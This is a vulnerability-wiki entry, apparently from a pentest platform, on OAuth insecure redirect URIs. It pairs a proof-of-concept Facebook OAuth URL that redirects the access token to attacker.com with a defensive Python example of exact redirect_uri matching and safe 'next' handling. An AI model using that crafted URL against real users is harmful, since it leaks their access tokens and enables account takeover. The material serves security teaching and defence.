Cobalt Crowdsourced Application Pentest

Cobalt Vulnerability Wiki


V4 - Access Control

OAuth Insecure Redirect URI

POC

1.) Sign in to a Facebook-linked account.

2.) Visit: https://www.facebook.com/v2.8/dialog/oauth?app_id=xxxx&client_id=xxxxx&display=popup&domain=xxxxxx&e2e=%7B%7D&locale=en_US&origin=1&redirect_uri=xxxxx/login?next_action=//attacker.com&response_type=token&scope=public_profile%2Cemail&sdk=joey&version=v2.8

3.) You'll be redirected to attacker.com and your access_token will be leaked.
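Added example (not part of the Cobalt wiki entry) showing the two checks that break this chain: the provider accepting only an exact, pre-registered redirect_uri, and the application refusing a post-login `next_action` value that a browser would resolve to another host. The registered URI, the host names and the `next_action` parameter name are assumptions.

```python
from urllib.parse import urlsplit, parse_qs

# Constructed sample: the redirect URIs this application registered with the provider.
REGISTERED_REDIRECT_URIS = {"https://app.example/login"}


def redirect_uri_allowed(redirect_uri: str) -> bool:
    """Provider side: the redirect_uri must equal a registered value exactly.
    No prefix or substring matching, so '?next_action=...' cannot ride along."""
    return redirect_uri in REGISTERED_REDIRECT_URIS


def authorization_request_ok(auth_url: str) -> bool:
    """Check an authorization request shaped like the one in the POC:
    exactly one redirect_uri, and it must pass redirect_uri_allowed()."""
    values = parse_qs(urlsplit(auth_url).query).get("redirect_uri", [])
    return len(values) == 1 and redirect_uri_allowed(values[0])


def safe_next_target(next_value: str) -> str:
    """Application side: the (already URL-decoded) next_action value is used
    only if it is a same-site path; anything else falls back to '/'."""
    if not next_value:
        return "/"
    # Control characters and whitespace are stripped by browsers ('/\t/attacker.com').
    if any(c.isspace() or ord(c) < 0x20 for c in next_value):
        return "/"
    # Browsers treat '/\attacker.com' like '//attacker.com'.
    candidate = next_value.replace("\\", "/")
    parts = urlsplit(candidate)
    # A scheme ('https:', 'javascript:') or netloc ('//attacker.com') is off-site.
    if parts.scheme or parts.netloc:
        return "/"
    # '///attacker.com' resolves to https://attacker.com/ in browsers, so any
    # leading run of two or more slashes is rejected as well.
    if not candidate.startswith("/") or candidate.startswith("//"):
        return "/"
    return candidate


# Constructed request in the shape of the POC (placeholder client id and hosts).
POC_STYLE_URL = ("https://provider.example/dialog/oauth?client_id=1234"
                 "&redirect_uri=https://app.example/login?next_action=//attacker.com"
                 "&response_type=token&scope=public_profile,email")
```

With exact matching the provider never issues the token to the tampered redirect_uri, and even if it did, the application's next_action handling would not forward the browser (and the token in the fragment) to attacker.com.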

Impact

Medium-High (depends on information disclosure)

Likelihood

Medium-High